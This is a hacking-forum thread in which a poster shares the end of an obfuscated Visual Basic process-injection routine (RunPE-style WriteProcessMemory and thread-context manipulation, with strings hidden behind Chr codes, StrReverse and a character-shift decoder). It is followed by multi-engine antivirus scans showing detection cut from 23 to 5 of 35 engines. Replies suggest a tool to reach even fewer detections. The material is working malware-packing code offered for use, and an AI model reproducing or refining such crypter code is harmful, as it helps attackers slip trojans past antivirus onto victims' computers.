  413.  & Chr$(80) & Chr$(82) & Chr$(90)), StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(Chr$(52) _
  414. )))))))))))), cQdlVdwtG.hThread, VarPtr(sGbh6tdbF)
  415. WriteProcessMemory cQdlVdwtG.CE9yvfJTt, ByVal sGbh6tdbF.Ebx + 8, dxNCenpxr.OptionalHeader.ImageBase, 4, 0
  416. sGbh6tdbF.Eax = dxNCenpxr.OptionalHeader.ImageBase + dxNCenpxr.OptionalHeader.AddressOfEntryPoint
  417. u7tGsr9W3 GCcQ9b7nT(Chr(61) & Chr(43) & Chr(62) & Chr(37) & Chr(42) & Chr(47) & Chr(102) & Chr(106), kMIvzyLCQ(StrReverse(Chr$(92) _
  418.  & Chr$(72) & Chr$(70) & Chr$(92) & Chr$(78) & Chr$(89) & Chr$(75) & Chr$(73) & Chr$(82) & Chr$(79) _
  419.  & Chr$(85) & Chr$(72) & Chr$(85) & Chr$(87) & Chr$(80) & Chr$(88) & Chr$(80) & Chr$(93) & Chr$(92) _
  420.  & Chr$(78) & Chr$(91) & Chr$(85) & Chr$(79) & Chr$(85) & Chr$(70) & Chr$(75) & Chr$(82) & Chr$(84) _
  421.  & Chr$(73) & Chr$(83) & Chr$(84) & Chr$(75) & Chr$(92) & Chr$(89) & Chr$(71) & Chr$(83) & Chr$(79) _
  422.  & Chr$(80) & Chr$(82) & Chr$(90)), StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(Chr$(52) _
  423. )))))))))))), GCcQ9b7nT(Chr(5) & Chr(43) & Chr(56) & Chr(31) & Chr(39) & Chr(49) & Chr(48) & Chr(57) & Chr(35) & Chr(19) & Chr(32) & Chr(43) & Chr(36) & Chr(43) & Chr(63) & Chr(54), kMIvzyLCQ(StrReverse(Chr$(92) _
  424.  & Chr$(72) & Chr$(70) & Chr$(92) & Chr$(78) & Chr$(89) & Chr$(75) & Chr$(73) & Chr$(82) & Chr$(79) _
  425.  & Chr$(85) & Chr$(72) & Chr$(85) & Chr$(87) & Chr$(80) & Chr$(88) & Chr$(80) & Chr$(93) & Chr$(92) _
  426.  & Chr$(78) & Chr$(91) & Chr$(85) & Chr$(79) & Chr$(85) & Chr$(70) & Chr$(75) & Chr$(82) & Chr$(84) _
  427.  & Chr$(73) & Chr$(83) & Chr$(84) & Chr$(75) & Chr$(92) & Chr$(89) & Chr$(71) & Chr$(83) & Chr$(79) _
  428.  & Chr$(80) & Chr$(82) & Chr$(90)), StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(Chr$(52) _
  429. )))))))))))), cQdlVdwtG.hThread, VarPtr(sGbh6tdbF)
  430. u7tGsr9W3 GCcQ9b7nT(Chr(61) & Chr(43) & Chr(62) & Chr(37) & Chr(42) & Chr(47) & Chr(102) & Chr(106), kMIvzyLCQ(StrReverse(Chr$(92) _
  431.  & Chr$(72) & Chr$(70) & Chr$(92) & Chr$(78) & Chr$(89) & Chr$(75) & Chr$(73) & Chr$(82) & Chr$(79) _
  432.  & Chr$(85) & Chr$(72) & Chr$(85) & Chr$(87) & Chr$(80) & Chr$(88) & Chr$(80) & Chr$(93) & Chr$(92) _
  433.  & Chr$(78) & Chr$(91) & Chr$(85) & Chr$(79) & Chr$(85) & Chr$(70) & Chr$(75) & Chr$(82) & Chr$(84) _
  434.  & Chr$(73) & Chr$(83) & Chr$(84) & Chr$(75) & Chr$(92) & Chr$(89) & Chr$(71) & Chr$(83) & Chr$(79) _
  435.  & Chr$(80) & Chr$(82) & Chr$(90)), StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(Chr$(52) _
  436. )))))))))))), GCcQ9b7nT(Chr(4) & Chr(43) & Chr(63) & Chr(62) & Chr(34) & Chr(38) & Chr(1) & Chr(48) & Chr(53) & Chr(53) & Chr(46) & Chr(33), kMIvzyLCQ(StrReverse(Chr$(92) _
  437.  & Chr$(72) & Chr$(70) & Chr$(92) & Chr$(78) & Chr$(89) & Chr$(75) & Chr$(73) & Chr$(82) & Chr$(79) _
  438.  & Chr$(85) & Chr$(72) & Chr$(85) & Chr$(87) & Chr$(80) & Chr$(88) & Chr$(80) & Chr$(93) & Chr$(92) _
  439.  & Chr$(78) & Chr$(91) & Chr$(85) & Chr$(79) & Chr$(85) & Chr$(70) & Chr$(75) & Chr$(82) & Chr$(84) _
  440.  & Chr$(73) & Chr$(83) & Chr$(84) & Chr$(75) & Chr$(92) & Chr$(89) & Chr$(71) & Chr$(83) & Chr$(79) _
  441.  & Chr$(80) & Chr$(82) & Chr$(90)), StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(Chr$(52) _
  442. )))))))))))), cQdlVdwtG.hThread
  443. End Sub
  444.  
  445. Public Function kMIvzyLCQ(FhbXF8MVH As String, lPCqbkM9x As Integer)
  446.     Dim kDFZMkl0Q As Integer
  447.    
  448.     For kDFZMkl0Q = 1 To Len(FhbXF8MVH)
  449.         Mid(FhbXF8MVH, kDFZMkl0Q, 1) = Chr(Asc(Mid(FhbXF8MVH, kDFZMkl0Q, 1)) - lPCqbkM9x)
  450.     Next kDFZMkl0Q
  451.     kMIvzyLCQ = FhbXF8MVH
  452. End Function
  453.  

Before:

Date and Time: 10/11/2012 3:45:23 P
File Name: sPrueba1.exe
File Size: 16384 Bytes
MD5: 672d19493b2faeb7cf8cf3ea64f51890
SHA1: e149fa00bb18b624fd51d13cdc8c8d7cb58035e8
Detection: 23 of 35 (66%)
Status: INFECTED

AVG Free - Clean!
ArcaVir - Clean!
Avast 5 - Win32:Inject-ATA [Trj]
AntiVir (Avira) - TR/Dropper.Gen
BitDefender - Gen:Trojan.Heur.ZGY.8
VirusBuster Internet Security - Trojan.VBInject.Gen.7
Clam Antivirus - Clean!
COMODO Internet Security - Clean!
Dr.Web - Trojan.VbCrypt.89
eTrust-Vet - Win32/VBInject.D!generic
F-PROT Antivirus - W32/VBInject.CC.gen!Eldorado (generic, not disinfectable)
F-Secure Internet Security - Gen:Trojan.Heur.ZGY.8
G Data - Gen:Trojan.Heur.ZGY.8, Win32:Inject-ATA [Trj]
IKARUS Security - Virus.Win32.VBInject
Kaspersky Antivirus - Worm.Win32.VBNA.b
McAfee - Clean!
MS Security Essentials - VirTool:Win32/VBInject.RT
ESET NOD32 - Trojan.Win32/Injector.WZ
Norman - W32/VBInject.YG
Norton Antivirus - Clean!
Panda Security - Clean!
A-Squared - Virus.Win32.VBInject!IK
Quick Heal Antivirus - Clean!
Rising Antivirus - Clean!
Solo Antivirus - Clean!
Sophos - Mal/VBInject-AK
Trend Micro Internet Security - Clean!
VBA32 Antivirus - infected Trojan.VB.Levelup
Vexira Antivirus - Trojan.VBInject.Gen.7
Zoner AntiVirus - Clean!
Ad-Aware - VirTool.Win32.VBInject.gen.bp (v)


Now:

Date and Time: 10/11/2012 3:53:27 P
File Name: sPrueba4.exe
File Size: 24576 Bytes
MD5: 847f8117c78d7e42d06b3ec11f4462f5
SHA1: ee1263d4edfab9f052f148ae6a76428cfcef8969
Detection: 5 of 35 (14%)
Status: INFECTED

AVG Free - Clean!
ArcaVir - Clean!
Avast 5 - Clean!
AntiVir (Avira) - TR/Dropper.Gen
BitDefender - Clean!
VirusBuster Internet Security - Clean!
Clam Antivirus - Clean!
COMODO Internet Security - TrojWare.Win32.Agent.angn@220045096
Dr.Web - Clean!
eTrust-Vet - Clean!
F-PROT Antivirus - W32/VBInject.CC.gen!Eldorado (generic, not disinfectable)
F-Secure Internet Security - Clean!
G Data - Clean!
IKARUS Security - Clean!
Kaspersky Antivirus - Clean!
McAfee - Clean!
MS Security Essentials - Clean!
ESET NOD32 - Clean!
Norman - Clean!
Norton Antivirus - Clean!
Panda Security - Clean!
A-Squared - Clean!
Quick Heal Antivirus - Clean!
Rising Antivirus - Clean!
Solo Antivirus - Clean!
Sophos - Mal/VBCheMan-D
Trend Micro Internet Security - Clean!
VBA32 Antivirus - Clean!
Vexira Antivirus - Clean!
Zoner AntiVirus - Clean!
Ad-Aware - Clean!
BullGuard - Clean!
Immunet Antivirus - Clean!
K7 Ultimate - Riskware ( ed2edfef0 )
VIPRE - Clean!


Enjoy, and greetings bros
« Last edit: May 12, 2014, 02:47:02 pm by Expermicid »

Sanko

« Reply #1 on: October 11, 2012, 05:42:54 pm »
but it's randomized with ACO...
Follow me on Twitter: @Sankosk
These new staff have no fucking idea XD

k0ws

« Reply #2 on: October 11, 2012, 07:48:15 pm »
Thanks for contributing, but even so, it's as Sanko says... Done properly, this can be done in 2 clicks with ACO, leaving it with fewer detections.

-Regards-

wh0!

« Reply #3 on: October 12, 2012, 02:58:49 am »
HAHAHAHAHAHAHAHAHAHAHAHAHA!  :o
